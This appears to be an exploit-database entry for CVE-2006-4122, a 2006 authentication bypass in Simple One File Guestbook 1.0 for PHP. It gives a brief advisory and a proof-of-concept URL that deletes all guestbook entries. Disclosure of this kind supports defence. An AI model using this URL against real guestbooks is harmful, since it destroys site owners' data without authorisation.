Simple One File Guestbook 1.0 - Security Bypass

Author: omnipresent
type: webapps
platform: php
port: 
date_added: 2006-08-09  
date_updated: 2013-09-18  
verified: 1  
codes: CVE-2006-4122;OSVDB-29159  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 28362.txt  

source: https://www.securityfocus.com/bid/19437/info

Simple one-file guestbook is prone to a security-bypass vulnerability. An attacker can bypass authentication measures by using a specific URL to delete all guestbook entries.

Version 1.0 of Simple one-file guestbook is vulnerable. Other versions may be affected as well.

#Simple One-File Guestbook Adminstrator Credential Bypass
#Proof of Concept URL

http://www.example.com/[path]/guestbook.php?id=4